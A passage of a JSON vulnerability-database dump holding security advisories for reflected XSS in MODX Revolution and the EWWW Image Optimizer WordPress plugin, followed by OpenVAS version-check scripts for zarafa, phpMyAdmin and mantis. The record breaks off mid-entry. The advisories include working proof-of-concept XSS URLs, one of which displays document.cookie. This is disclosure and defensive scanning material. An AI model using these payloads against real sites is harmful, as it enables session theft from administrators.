word:\r\n\r\nhttp://[host]/manager/?a=%22%20onload=%22javascript:alert%28/immuniweb/%29;%22%3E\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate "manager/templates/default/header.tpl" file from GitHub.\r\n\r\nMore Information:\r\nhttps://github.com/modxcms/revolution/issues/11966\r\nhttps://github.com/modxcms/revolution/commit/e36f80f18e9514204bf2ce82747c8adf7e47a9c9\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23229 - https://www.htbridge.com/advisory/HTB23229 - Reflected Cross-Site Scripting (XSS) in MODX Revolution.\r\n[2] MODX Revolution - http://modx.com - MODX Revolution is the web content management platform for those that truly care about no-compromise design and exceptional user experience. It gives you complete control over your site and content, with the flexibility and scalability to adapt to your changing needs.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31189", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31189", "title": "Reflected Cross-Site Scripting (XSS) in MODX Revolution", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-6243"], "description": "\r\n\r\nAdvisory ID: HTB23234\r\nProduct: EWWW Image Optimizer WordPress plugin\r\nVendor: Shane Bishop\r\nVulnerable Version(s): 2.0.1 and probably prior\r\nTested Version: 2.0.1\r\nAdvisory Publication: September 17, 2014 [without technical details]\r\nVendor Notification: September 17, 2014 \r\nVendor Patch: September 24, 2014 \r\nPublic Disclosure: October 8, 2014 \r\nVulnerability Type: Cross-Site Scripting [CWE-79]\r\nCVE Reference: CVE-2014-6243\r\nRisk Level: Low \r\nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in EWWW Image Optimizer WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin.\r\n\r\n\r\n1) Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress plugin: CVE-2014-6243\r\n\r\nInput passed via the "page" HTTP GET parameter to "/wp-admin/options-general.php" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.\r\n\r\nThe exploitation example below uses the "alert()" JavaScript function to display administrator's cookies:\r\n\r\nhttp://wordpress/wp-admin/options-general.php?page=ewww-image-optimizer/ewww-image-optimizer.php&pngout=failed&error=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to EWWW Image Optimizer 2.0.2.\r\n\r\nMore Information:\r\nhttps://wordpress.org/plugins/ewww-image-optimizer/changelog/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23234 - https://www.htbridge.com/advisory/HTB23234 - Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin.\r\n[2] EWWW Image Optimizer WordPress plugin - http://www.shanebishop.net/ - Reduce file sizes for images within WordPress including NextGEN Gallery and GRAND FlAGallery. Uses jpegtran, optipng/pngout, and gifsicle.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31166", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31166", "title": "Reflected Cross-Site Scripting (XSS) in EWWW Image Optimizer WordPress Plugin", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2019-05-29T18:37:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-08-31T00:00:00", "id": "OPENVAS:1361412562310868143", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868143", "type": "openvas", "title": "Fedora Update for zarafa FEDORA-2014-9754", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zarafa FEDORA-2014-9754\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868143\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-31 05:52:21 +0200 (Sun, 31 Aug 2014)\");\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for zarafa FEDORA-2014-9754\");\n script_tag(name:\"affected\", value:\"zarafa on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9754\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137158.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zarafa'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"zarafa\", rpm:\"zarafa~7.1.10~4.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:33", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5450", "CVE-2014-5447", "CVE-2014-5449", "CVE-2014-5448"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-09-03T00:00:00", "id": "OPENVAS:1361412562310868164", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868164", "type": "openvas", "title": "Fedora Update for zarafa FEDORA-2014-9768", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zarafa FEDORA-2014-9768\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868164\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-03 05:54:10 +0200 (Wed, 03 Sep 2014)\");\n script_cve_id(\"CVE-2014-5447\", \"CVE-2014-5448\", \"CVE-2014-5449\", \"CVE-2014-5450\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"Fedora Update for zarafa FEDORA-2014-9768\");\n script_tag(name:\"affected\", value:\"zarafa on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9768\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137232.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zarafa'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"zarafa\", rpm:\"zarafa~7.1.10~4.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:22", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-18T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4986", "CVE-2014-4955"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310108229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_jul14_lin.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108229\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-18 11:18:02 +0200 (Fri, 18 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4955\");\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Linux)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-5/\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-6/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x prior to 4.2.6, 4.1.x prior to 4.1.14.2, and 4.0.x prior to 4.0.10.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6, 4.1.14.2 or 4.0.10.1.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.1\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.1\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.2\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n vuln = TRUE;\n fix = \"4.2.6\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:09", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-18T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4986", "CVE-2014-4955"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310108228", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108228", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln_jul14_win.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Windows)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108228\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-18 11:18:02 +0200 (Fri, 18 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2014-4986\", \"CVE-2014-4955\");\n script_name(\"phpMyAdmin Multiple Cross-Site Scripting Vulnerabilities - Jul14 (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-5/\");\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-6/\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin 4.2.x prior to 4.2.6, 4.1.x prior to 4.1.14.2, and 4.0.x prior to 4.0.10.1.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.2.6, 4.1.14.2 or 4.0.10.1.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.0\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.0.10.1\" ) ) {\n vuln = TRUE;\n fix = \"4.0.10.1\";\n }\n}\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n vuln = TRUE;\n fix = \"4.1.14.2\";\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n vuln = TRUE;\n fix = \"4.2.6\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:fix );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:37:35", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.", "cvss3": {}, "published": "2014-09-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3030-1 (mantis - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310703030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703030", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3030.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3030-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703030\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_name(\"Debian Security Advisory DSA 3030-1 (mantis - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-20 00:00:00 +0200 (Sat, 20 Sep 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3030.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mantis on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\");\n script_tag(name:\"summary\", value:\"Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-28T10:48:26", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.", "cvss3": {}, "published": "2014-09-20T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3030-1 (mantis - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2017-07-13T00:00:00", "id": "OPENVAS:703030", "href": "http://plugins.openvas.org/nasl.php?oid=703030", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3030.nasl 6715 2017-07-13 09:57:40Z teissa $\n# Auto-generated from advisory DSA 3030-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703030);\n script_version(\"$Revision: 6715 $\");\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_name(\"Debian Security Advisory DSA 3030-1 (mantis - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-13 11:57:40 +0200 (Thu, 13 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-09-20 00:00:00 +0200 (Sat, 20 Sep 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3030.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"mantis on Debian Linux\");\n script_tag(name: \"insight\", value: \"Mantis is an issue tracker that is implemented in PHP.\nThe main features include:\n\n* Web Based\n* Supports any platform that runs PHP\n* Available in 68 localizations\n* Customizable Issue Pages\n* Multiple Projects per instance\n* Support for Projects, Sub-Projects, and Categories.\n* Users can have a different access level per project\n* Changelog Support\n* Roadmap\n* User View Page\n* Search and Filter\n* Built-in Reporting (reports / graphs)\n* Time Tracking\n* Custom Fields\n* Email notifications\n* Users can monitor specific issues\n* Attachments\n* Issue Change History\n* RSS Feeds\n* Customizable issue workflow\n* Sponsorships Support\n* Export to csv, Microsoft Excel, Microsoft Word\n* No limit on the number of users, issues, or projects.\n* Public / Private Projects\n* Public / Private Notes\n* Public / Private Issues\n* Public / Private News\n* Issue Relationships\n* Authentication\n+ Default Mantis Authentication (recommended)\n+ LDAP Integration\n+ HTTP Basic Authentication Support\n+ Active Directory Integration (patches available)\n* Multi-DBMS Support (using ADODB)\n+ MySQL\n+ MS SQL\n+ PostgreSQL\n+ Oracle (experimental)\n* Webservice (SOAP) interface\n* and more\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1.2.11-1.2+deb7u1.\n\nWe recommend that you upgrade your mantis packages.\");\n script_tag(name: \"summary\", value: \"Multiple SQL injection vulnerabilities have been discovered in the Mantis\nbug tracking system.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mantis\", ver:\"1.2.11-1.2+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:32", "description": "There are multiple SQL Injection vulnerabilities in MantisBT which allow\n a remote attacker to access or modify data.", "cvss3": {}, "published": 